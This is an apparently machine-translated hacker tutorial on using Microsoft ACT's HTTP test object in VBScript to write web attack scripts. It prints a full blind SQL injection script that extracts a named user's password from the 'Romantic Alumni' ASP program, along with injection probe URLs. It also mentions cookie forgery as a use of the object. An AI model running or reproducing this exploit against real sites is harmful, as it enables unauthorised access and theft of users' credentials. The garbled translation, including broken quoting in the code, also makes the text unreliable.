Use VBS to write 80-port attack scripts such as SQL injection

Intermediary transaction SEO diagnosis Taobao guest Cloud host technology Hall

Source: http://www.viphot.com/

I accidentally flipped a VBS script in the machine last night and suddenly found an object Test.sendrequest ("http://" & G_sserver & "/testfiles/browser.asp") that I hadn't seen before. Although the object has not been seen, the meaning is obvious: send an HTTP request. It was supposed to be the WMI Script API, but it didn't find the statement that created the object, and in Microsoft Act, Microsoft Act is a tool for testing sites in the Visual Studio.NET (Long, is this useful in the future?). If not, how do you look at this?), previously opened, but did not study how to use it, so I opened the Help file (checked MSDN has: Ms-help://ms. Vscc/ms. msdnvs.2052/act/htm/actml_main.htm), roughly read, unexpectedly is a complete set of HTTP client objects (do not know if this is not accurate), the object and attributes listed, you can see the following is the test object model, There is also a Creator object model, and if you have an interest in understanding, see MSDN, I am still learning:

-connection objects

Close method

Send method

IsOpen Property

Port Property

Redirectdepth Property

Server Properties

UseSSL Property

-cookie object//Because it is the test site, using a scripting program to simulate multi-user, this can be used to set the cookie for each user, that can be used to tamper with, hehe

Expires property

Name property

Path property

Value property

-cookies objects

Add method

Remove method

RemoveAll method

Count Property

Item Property

-header objects

Name property

Value property

-request objects

Body Property

CodePage Property

Encodebody Property

EncodeQueryAsUTF8 Property

Headers property

Httpversion Property

Path property

Responsebuffersize Property

Verb property

-response objects

The Body property//Gets the text of the HTTP response. Returns only the body part of the response buffer.

CodePage Property

Bytesrecv Property

BytesSent Property

ContentLength Property

Headers property

Headersize Property

Httpversion Property

Path property

Port Property

ResultCode Property

HTTP status Code

Server Properties

TTFB Property

Ttlb Property

UseSSL Property

-test objects

CreateConnection method

Createrequest method

Getcurrentuser method

Getglobalindex method

Getglobalvariable method

Getnextuser method

Incrementglobalindex method

SendRequest method

Setglobalindex method

Setglobalvariable method

Sleep method

Trace method

TraceLevel Property

-user objects

Cookies Properties

Name property

Password property

Here, you may think of a lot of useful things, such as test site, test server, test program, cookie forgery ... Look at your imagination, the first thing I'm interested in is the phrase that starts with: Test.sendrequest ("http://" & G_sserver & "/testfiles/browser.asp"), The SendRequest method Description of the test object:

Oresponse = Test.sendrequest (strURL)

Parameter: strURL As String: represents the requested URL

Return value: Oresponse as reponse: An object representing the response of a Web server responding to a request (that is, the response object above)

This object allows us to easily write 80-port attack programs, such as the snow-tracing function, now popular SQL injection, the network of SQL injection attacks are mostly written in Perl, I do not Perl, C Write a complete socket program is relatively cumbersome, is this object for the VBS provided the possibility, and the program is quite simple, although sacrificing efficiency, but for our rookie is a good way, here is an example to illustrate:

Romantic Alumni is a set of free ASP alumni program, perhaps you have not heard, but in the Alumni Class free web program is considered to be excellent, so there are many sites adopted or modified after the use of it (I have read the high school's website of the alumni is used in this set of procedures rewritten), I have V1.60, last year down from the internet down, write this article in the bedroom, not on the net, also can not get the latest version, anyway, just an example, on the use of it, hehe. Roughly read some code found that many places can be injected, the most obvious (because on the home page to see) Is it a forum form of the message board showthread.asp:

...

Topicid=request ("Rootid")

Sql= "Select Topic,hits from BBS where parentid=0 and bbsid=" &topicid

Set Rs=conn.execute (SQL)

...

Very old and classic one, hehe, try it:

Http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=1

http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=2

Data table structure I know that the user name can also be seen in the user list, then this example shows a guess the password, what? Too easy? Just an example, don't laugh oh ~ ~ Write time is not plain sailing ~ ~ Write very poor, especially in the cycle if the right to detect should exit the loop, But can not think how to quit (Break?exit?), but for the password stored in the program is enough, a 6-bit password used about 15 seconds to guess, improved will improve a lot, but the efficiency of the always and Perl can not be compared.

To use this object to install the Microsoft Act is a tool in Visual Studio.NET, I failed to register the associated DLL directly with REGSRV32 on another machine, so I still have to install it.

'*********************************************

' Romantic Alumni V1.60 Vulnerability test script by Luoluo

' Note: You need to install the ACT tool in Visual Studio.NET

'*********************************************

' ********************************** optimized, higher efficiency

Option Explicit

On Error Resume Next

Dim Test

Dim O_response

Dim wrong

Dim i,j,k

Dim Pwd_len

Dim pwd

Dim strings

Dim username

' The user name of the person to crack from the command line

If WScript.Arguments.Count > 0 Then

Username = wscript.arguments (0)

Else

Username = "Luoluo"

End If

WScript.Echo "Start probing, please wait ..."

' The logo on the right page, this random look, because as long as it is two pages returned to the different parts of the

wrong = "Luoluoisachinesehacker"

' Store password

PWD = ""

' The character range of the password

strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

' Set up objects

Set Test = CreateObject ("ACT. Test ")

' The length of the user's password

For i = 0 to 128 Step 1

' Send a request, return a response object, the address length can be divided into segments with &, so look some

Set o_response = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid=7%20and%20exists%20 (Select%20userid%20from%20student%20where%20len (userpwd) = ' "& I &" '%20and% 20userid= ' "& Username &") "

' If the returned page has the correct flag, then the length is right.

If InStr (O_response.body, wrong) <> 0 Then

Pwd_len = "" & I & ""

Exit for

End If

Next

' Guess the user's password

For j = 1 to Pwd_len Step 1

For k = 1 to Len (strings) Step 1

Set o_response = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid=7%20and%20exists%20 (Select%20userid%20from%20student%20where%20left (Userpwd, "& J &") = ' & pwd & Mid (strings,k,1) & "'%20and%20userid= '" & Username & "")

If InStr (O_response.body, wrong) <> 0 Then

PWD = pwd & Mid (strings,k,1)

Exit for

End If

Next

Next

If Err Then

WScript.Echo "Error:" & Error.description

Error.clear

Else

' Output password

WScript.Echo "Password:" & pwd

End If

Set Test = Nothing